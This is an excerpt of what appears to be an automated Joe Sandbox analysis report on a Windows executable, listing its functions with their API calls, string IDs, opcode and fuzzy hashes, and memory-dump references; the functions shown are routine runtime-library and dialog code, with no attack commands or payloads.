    • API ID: _wcslen$CurrentDirectory
    • String ID: UNC$\\?\
    • API String ID: 3341907918-253988292
    • Opcode ID: 5c606486565e67c1d2933aaedb7d7de689e4dd547254ce997945317652dbdc3f
    • Instruction ID: a7190424b2882d4e2fabf044cf0c5262110141bb6d2331f03ca3698324cd75ae
    • Opcode Fuzzy Hash: 5c606486565e67c1d2933aaedb7d7de689e4dd547254ce997945317652dbdc3f
    • Instruction Fuzzy Hash: 0B41E3B1440219BADF60AF60CC01FEF73A9AF05391F144037FD58E7142E774A9468A99
    Function 0005C8BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
    Download Yara Rule
    APIs
    • LoadBitmapW.USER32(00000065), ref: 0005C8CD
    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005C8F2
    • DeleteObject.GDI32(00000000), ref: 0005C924
    • DeleteObject.GDI32(00000000), ref: 0005C947
      • Part of subcall function 0005B6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C91D,00000066), ref: 0005B6D5
      • Part of subcall function 0005B6C2: SizeofResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B6EC
      • Part of subcall function 0005B6C2: LoadResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B703
      • Part of subcall function 0005B6C2: LockResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B712
      • Part of subcall function 0005B6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C91D,00000066), ref: 0005B72D
      • Part of subcall function 0005B6C2: GlobalLock.KERNEL32(00000000), ref: 0005B73E
      • Part of subcall function 0005B6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005B762
      • Part of subcall function 0005B6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B7A7
      • Part of subcall function 0005B6C2: GlobalUnlock.KERNEL32(00000000), ref: 0005B7C6
      • Part of subcall function 0005B6C2: GlobalFree.KERNEL32(00000000), ref: 0005B7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
    • String ID: ]
    • API String ID: 1797374341-3352871620
    • Opcode ID: c97a98f01981223de7ee8829ad304a331f7ceae87834e565261ca9d4a377e1d3
    • Instruction ID: 4b694782730cc00f6158b5782e5524236928e3fa48264623b1fc8477edfaf392
    • Opcode Fuzzy Hash: c97a98f01981223de7ee8829ad304a331f7ceae87834e565261ca9d4a377e1d3
    • Instruction Fuzzy Hash: 9E01D236500B057BE71277649C09EBF3ABAAF82B63F180014FD40B7292EF659C0D86A0
    Function 0005E740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005E78B
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0005E7A1
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005E7B5
    • SetDlgItemTextW.USER32(?,00000068), ref: 0005E7C4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: RENAMEDLG
    • API String ID: 364370097-3299779563
    • Opcode ID: d3e7cf2972828dd2e5b7a90653f27ab83fd8cdf21b4ef230cb67599566720945
    • Instruction ID: 58b6aaa36ced6e5f2c4f351418f90a08dac7ab757cf75ec77f86882d47c9538c
    • Opcode Fuzzy Hash: d3e7cf2972828dd2e5b7a90653f27ab83fd8cdf21b4ef230cb67599566720945
    • Instruction Fuzzy Hash: 3F012832688A587AF2244B64DC09FAB379DFB5EB03F100010F782A60D0C6A65A098B69
    Function 00069225 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000691D6,00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002), ref: 00069245
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00069258
    • FreeLibrary.KERNEL32(00000000,?,?,?,000691D6,00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002), ref: 0006927B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: f38b97ae92ab8e62feaf2611d9ac9b761b5210a0565b324c337878bdc4c143a9
    • Instruction ID: 32753cd5b627af02ed960c3c7187b66684a73a743802a88c85fd97a6a8bbecba
    • Opcode Fuzzy Hash: f38b97ae92ab8e62feaf2611d9ac9b761b5210a0565b324c337878bdc4c143a9
    • Instruction Fuzzy Hash: 14F0AF30E00208BBEF519BA0DC19BAEBFB9EF04711F004164F909B6161CB785E81CA90
    Function 00050620 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00051B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
      • Part of subcall function 00051B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005063F
    • GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005064F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
    • Instruction ID: 5783d7cf3ed9597c72d2f5fcc8ddbcbc4ca139f06458d705d32556b6d6c25a98
    • Opcode Fuzzy Hash: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
    • Instruction Fuzzy Hash: 9CE04F70C457819EE7605F749808B477FD45B14712B00C81DA79DA7552D7BCD8848B54
    Function 00063D5A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AdjustPointer$_abort
    • String ID:
    • API String ID: 2252061734-0
    • Opcode ID: 1dbed777fc27ab3f91d0b9d2fdcaaf8a7bde63c43c45444f72bd31743ce2837e
    • Instruction ID: f131a93c284a5981de4300ddfa0ae984a758775b9a43ad1b7e8e858dba3e2791
    • Opcode Fuzzy Hash: 1dbed777fc27ab3f91d0b9d2fdcaaf8a7bde63c43c45444f72bd31743ce2837e
    • Instruction Fuzzy Hash: 4F51E671A05206AFDB698F54D841BBA77E7EF50310F14452DE905872D2E732EE80CBE0
    Function 0006D0E0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0006D0E9
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006D10C
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006D132
    • _free.LIBCMT ref: 0006D145
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006D154
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: 8e6eaf3f8cc5ec6a2219c37c00e549be72176006de67531a09e533b3380ab0ac
    • Instruction ID: 541630246a1d330ae3acfaf8da3305d0c1063c6f6d287000083dc0f1c10198bd
    • Opcode Fuzzy Hash: 8e6eaf3f8cc5ec6a2219c37c00e549be72176006de67531a09e533b3380ab0ac
    • Instruction Fuzzy Hash: CB017572F012157F373126B66C48C7B6AAEEFC7BA1314012AB908DA201DBA48C418170
    Function 0006A589 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00083070,00000200,0006A7E0,00067586,?,?,?,?,0004ECA4,?,03222240,00000064,00000004,0004EA30,?), ref: 0006A58E
    • _free.LIBCMT ref: 0006A5C3
    • _free.LIBCMT ref: 0006A5EA
    • SetLastError.KERNEL32(00000000,00074ADC,00000050,00083070), ref: 0006A5F7
    • SetLastError.KERNEL32(00000000,00074ADC,00000050,00083070), ref: 0006A600
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: b93c938b3a9fa192a0e23205756658e2b9e74600d70c956e52f223ff39301897
    • Instruction ID: b45981702f745e035b3c41f5046e0d142b223f3cdee2cc3f44f95c5de59f8fb1
    • Opcode Fuzzy Hash: b93c938b3a9fa192a0e23205756658e2b9e74600d70c956e52f223ff39301897
    • Instruction Fuzzy Hash: 72012D32744A01ABE311B7746D45E6B219BEFC33703250018FA07F2153EF788D454D66
    Function 0006D9AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 0006D9C7
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006D9D9
    • _free.LIBCMT ref: 0006D9EB
    • _free.LIBCMT ref: 0006D9FD
    • _free.LIBCMT ref: 0006DA0F
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
    • Instruction ID: b96a159f329df5c128572bd7d60945236b9962c0e6581550cf0d351b677d6408
    • Opcode Fuzzy Hash: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
    • Instruction Fuzzy Hash: E8F0FF72B08210ABD6A0EB68E986C5673EBBB157117580C07F48CE7501CB74FC808B75
    Function 00053328 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00053330
    • _wcslen.LIBCMT ref: 00053341
    • _wcslen.LIBCMT ref: 00053351
    • _wcslen.LIBCMT ref: 0005335F
    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0004C844,?,?,00000000,?,?,?), ref: 0005337A
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$CompareString
    • String ID:
    • API String ID: 3397213944-0
    • Opcode ID: 193496a7c3c3c91f4dc316ae512b5429fb251705ba239a267a59e4c230de39dd
    • Instruction ID: 2ccb029abfc66f66201ae6a530313ce9cf9b12d6f6674e1ef6aaf9349267bd00
    • Opcode Fuzzy Hash: 193496a7c3c3c91f4dc316ae512b5429fb251705ba239a267a59e4c230de39dd
    • Instruction Fuzzy Hash: 39F03A32108214BFCF222F51EC09DCE3F26EB48BB1B218425FA196E462CF32D695D6D0
    Function 00069CC0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 00069CDE
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 00069CF0
    • _free.LIBCMT ref: 00069D03
    • _free.LIBCMT ref: 00069D14
    • _free.LIBCMT ref: 00069D25
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
    • Instruction ID: 9b2779447b557187e7f1a541bac2bfff4237ef3f40a3fc398d5b0e6f0bffdad9
    • Opcode Fuzzy Hash: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
    • Instruction Fuzzy Hash: 94F08278D059208FE7417F14FC464493BE6F7A77313550606F11A63272C7BD08028F95
    Function 00052938 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: c48f8643084ea22cf7e6de5a41764b65dc2ceed50f749ee3a285804a7c5165bc
    • Instruction ID: 5a75b6fd942ffbc2da4f1f98b7196a49bef16ac61635cda999d7a2b417df982a
    • Opcode Fuzzy Hash: c48f8643084ea22cf7e6de5a41764b65dc2ceed50f749ee3a285804a7c5165bc
    • Instruction Fuzzy Hash: 9351E77168C301FEFA311A94CC02FBF7659AF17B03F204516BF8A645E6C7A26458A71B
    Function 00069320 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fcl52nBWuY.exe,00000104), ref: 00069360
    • _free.LIBCMT ref: 0006942B
    • _free.LIBCMT ref: 00069435
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\fcl52nBWuY.exe
    • API String ID: 2506810119-289269042
    • Opcode ID: f92365274ac72f0c0bcee0dcf44c57361efa0e903382437a6841ef80c96e329e
    • Instruction ID: 3f85f2c8e2d3a8dc9c47c37a121df749a0a9296ce0415e32d9dd4aed6befdb46
    • Opcode Fuzzy Hash: f92365274ac72f0c0bcee0dcf44c57361efa0e903382437a6841ef80c96e329e
    • Instruction Fuzzy Hash: C831A071A04258EFDB21DF99DC81DAEBBFEEF86710F104066F50497612D7B08A41CB91
    Function 00064356 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0006437B
    • _abort.LIBCMT ref: 00064486
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: EncodePointer_abort
    • String ID: MOC$RCC
    • API String ID: 948111806-2084237596
    • Opcode ID: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
    • Instruction ID: b555842112fb067234d7e31ab9851d6104fdaa825876cd63df26284fd5748e07
    • Opcode Fuzzy Hash: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
    • Instruction Fuzzy Hash: 0C414871900209AFCF15DF98CC82AEEBBB6BF49304F198159F904B7262D7359A51DB90
    Function 00047F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00047F20
      • Part of subcall function 000442F1: __EH_prolog.LIBCMT ref: 000442F6
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00047FE5
      • Part of subcall function 00048704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00048713
      • Part of subcall function 00048704: GetLastError.KERNEL32 ref: 00048759
      • Part of subcall function 00048704: CloseHandle.KERNEL32(?), ref: 00048768
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
